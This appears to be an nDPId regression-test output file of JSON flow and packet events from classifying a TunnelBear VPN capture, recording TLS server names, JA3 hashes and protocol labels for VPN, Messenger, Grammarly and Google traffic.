{"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734754614,"flow_last_seen":1655734754614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1655734754614,"l3_proto":"ip4","src_ip":"10.158.132.91","dst_ip":"104.17.114.40","src_port":38398,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1655734754614,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734754614,"pkt":"ABoRAAACABoRAAABCABFAAAoVtFAAEAGeswKnoRbaBFyKJX+AbuhM960Ee9+klAQAVedJwAA"} 
+01154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1655734754615,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1655734754615,"pkt":"ABoRAAACABoRAAABCABFAAItVtJAAEAGeMYKnoRbaBFyKJX+AbuhM960Ee9+klAYAVc2sQAAFgMBAgABAAH8AwOffU2PEFvusphnSRt4iypv4+ZmiFJN5MhWLpPRgxBGWyBzS35friOfAWwzRvK4nOaCBJAbSD\/HvnzVJtlqjl91KAAYwCvALMypwC\/AMMyowBPAFACcAJ0ALwA1AQABm\/8BAAEAAAAAGQAXAAAUYXBpLnBvbGFyZ3JpenpseS5jb20AFwAAACMAwMEVNlaL0tdGnm3V54JqurXqfhCsyPABZtbMnzb26AxMffuozfeg4IKaCIbNJ3q2zznlQTcn2vtZGw2LgspfFkx\/\/ulZltuMfvovkdu6OxfbcYa5VnIF3xidmaUJ8SUPb79tJJFaBhFXEN61mvGK7zPpvVrV3mTyXEwUGGWTkZAGHvhktDm3FDiaeMeQoyzU\/JxID7YfTFAEkYxMS3+IaSjPuX3oi2kUbrLhwugcx7H6N+6QUOak1x1EA8eU6f8ZVAANABQAEgQDCAQEAQUDCAUFAQgGBgECAQAFAAUBAAAAAAAQAA4ADAJoMghodHRwLzEuMQALAAIBAAAKAAgABgAdABcAGAAVAGgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1655734754614,"flow_last_seen":1655734754615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1655734754615,"l3_proto":"ip4","src_ip":"10.158.132.91","dst_ip":"104.17.114.40","src_port":38398,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734754648,"flow_last_seen":1655734754648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1655734754648,"l3_proto":"ip4","src_ip":"10.158.132.91","dst_ip":"8.8.8.8","src_port":51120,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1655734754648,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655734754648,"pkt":"ABoRAAACABoRAAABCABFAAA0IExAAEAGe28KnoRbCAgICMewADWRpqgvfDsVvoAQAVcLYgAAAQEICgFkiHG27faC"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1655734754650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655734754650,"pkt":"ABoRAAACABoRAAABCABFAAA0IE1AAEAGe24KnoRbCAgICMewADWRpqgvfDsVvoARAVcLYAAAAQEICgFkiHK27faC"} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1655734754651,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734754651,"pkt":"ABoRAAACABoRAAABCABFAAAoAElAABAGy34ICAgICp6EWwA1x7B8OxW+kaaoMFAQ\/\/99FQAA"} +01154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1655734754841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1655734754841,"pkt":"ABoRAAACABoRAAABCABFAAItVtNAAEAGeMUKnoRbaBFyKJX+AbuhM960Ee9+klAYAVc2sQAAFgMBAgABAAH8AwOffU2PEFvusphnSRt4iypv4+ZmiFJN5MhWLpPRgxBGWyBzS35friOfAWwzRvK4nOaCBJAbSD\/HvnzVJtlqjl91KAAYwCvALMypwC\/AMMyowBPAFACcAJ0ALwA1AQABm\/8BAAEAAAAAGQAXAAAUYXBpLnBvbGFyZ3JpenpseS5jb20AFwAAACMAwMEVNlaL0tdGnm3V54JqurXqfhCsyPABZtbMnzb26AxMffuozfeg4IKaCIbNJ3q2zznlQTcn2vtZGw2LgspfFkx\/\/ulZltuMfvovkdu6OxfbcYa5VnIF3xidmaUJ8SUPb79tJJFaBhFXEN61mvGK7zPpvVrV3mTyXEwUGGWTkZAGHvhktDm3FDiaeMeQoyzU\/JxID7YfTFAEkYxMS3+IaSjPuX3oi2kUbrLhwugcx7H6N+6QUOak1x1EA8eU6f8ZVAANABQAEgQDCAQEAQUDCAUFAQgGBgECAQAFAAUBAAAAAAAQAA4ADAJoMghodHRwLzEuMQALAAIBAAAKAAgABgAdABcAGAAVAGgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734755247,"flow_last_seen":1655734755247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734755247,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.7.32","src_port":60224,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1655734755247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734755247,"pkt":"ABoRAAACABoRAAABCABFAAA8IytAAEAGaHgKCAABnfAHIOtAAbueF6osAAAAAKAC\/\/\/ZOgAAAgQFtAQCCAoBZIkHAAAAAAEDAwg="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1655734755253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734755253,"pkt":"ABoRAAACABoRAAABCABFAAAoAEtAABAGu2yd8AcgCggAAQG760Bh6FXTnheqLVAS\/\/8TvQAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1655734755253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734755253,"pkt":"ABoRAAACABoRAAABCABFAAAoIyxAAEAGaIsKCAABnfAHIOtAAbueF6otYehV1FAQ\/\/8TvgAA"} 
+01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734755247,"flow_last_seen":1655734755261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1655734755261,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.7.32","src_port":60224,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mqtt-mini.facebook.com","ja3":"82932b3c6398511df186dfc9416db2d4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +01063{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":205,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734755247,"flow_last_seen":1655734755401,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2760,"flow_tot_l4_payload_len":2989,"flow_avg_l4_payload_len":498,"midstream":0,"thread_ts_msec":1655734755401,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.7.32","src_port":60224,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"mqtt-mini.facebook.com","ja3":"82932b3c6398511df186dfc9416db2d4","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734759670,"flow_last_seen":1655734759670,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734759670,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"99.83.135.170","src_port":47594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1655734759670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734759670,"pkt":"ABoRAAACABoRAAABCABFAAA8gORAAEAGxNEKCAABY1OHqrnqAbsKjg29AAAAAKAC\/\/\/wSgAAAgQFtAQCCAoBZI1ZAAAAAAEDAwg="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1655734759675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734759675,"pkt":"ABoRAAACABoRAAABCABFAAAoAFRAABAGdXZjU4eqCggAAQG7uer1cfJCCo4NvlAS\/\/\/\/JQAA"} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1655734759675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734759675,"pkt":"ABoRAAACABoRAAABCABFAAAogOVAAEAGxOQKCAABY1OHqrnqAbsKjg2+9XHyQ1AQ\/\/\/\/JgAA"} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734759670,"flow_last_seen":1655734759678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655734759678,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"99.83.135.170","src_port":47594,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"capi.grammarly.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734759670,"flow_last_seen":1655734760073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1553,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1655734760073,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"99.83.135.170","src_port":47594,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"capi.grammarly.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1655734759670,"flow_last_seen":1655734760124,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4026,"flow_tot_l4_payload_len":5579,"flow_avg_l4_payload_len":697,"midstream":0,"thread_ts_msec":1655734760124,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"99.83.135.170","src_port":47594,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"capi.grammarly.com","server_names":"capi.grammarly.com,capi-msdk.grammarly.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=capi.grammarly.com","fingerprint":"1F:4A:0B:A6:60:01:94:7D:3D:94:03:14:5A:30:AF:64:D5:EC:58:DD"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734764418,"flow_last_seen":1655734764418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734764418,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.200.188","src_port":47046,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1655734764418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734764418,"pkt":"ABoRAAACABoRAAABCABFAAA8CMpAAEAGFLAKCAABSn3IvLfGFGxd05k2AAAAAKAC\/\/\/UHwAAAgQFtAQCCAoBZJH8AAAAAAEDAwg="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1655734764423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734764423,"pkt":"ABoRAAACABoRAAABCABFAAAoAGFAABAGTS1Kfci8CggAARRst8aiLGbJXdOZN1AS\/\/\/GXAAA"} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1655734764423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734764423,"pkt":"ABoRAAACABoRAAABCABFAAAoCMtAAEAGFMMKCAABSn3IvLfGFGxd05k3oixmylAQ\/\/\/GXQAA"} +01147{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734764418,"flow_last_seen":1655734764426,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.200.188","src_port":47046,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"58e34c2965c9f3fa4919d58deef1f49e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1655734524335,"flow_last_seen":1655734525874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3657,"flow_tot_l4_payload_len":13718,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1655734524340,"flow_last_seen":1655734524597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3657,"flow_tot_l4_payload_len":4733,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1655734524343,"flow_last_seen":1655734524541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3655,"flow_tot_l4_payload_len":4731,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45108,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1655734524346,"flow_last_seen":1655734524597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3658,"flow_tot_l4_payload_len":4734,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1655734525210,"flow_last_seen":1655734525633,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":894,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} 
+00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1655734525218,"flow_last_seen":1655734525773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":3489,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +01186{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734764418,"flow_last_seen":1655734764619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":736,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1655734764619,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.200.188","src_port":47046,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mtalk.google.com","ja3":"58e34c2965c9f3fa4919d58deef1f49e","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776460,"flow_last_seen":1655734776460,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776460,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33830,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1655734776460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776460,"pkt":"ABoRAAACABoRAAABCABFAAA8JvtAAEAGL38KCAABaBFyKIQmAbsyg7tFAAAAAKAC\/\/9Q8AAAAgQFtAQCCAoBZJ2+AAAAAAEDAwg="} 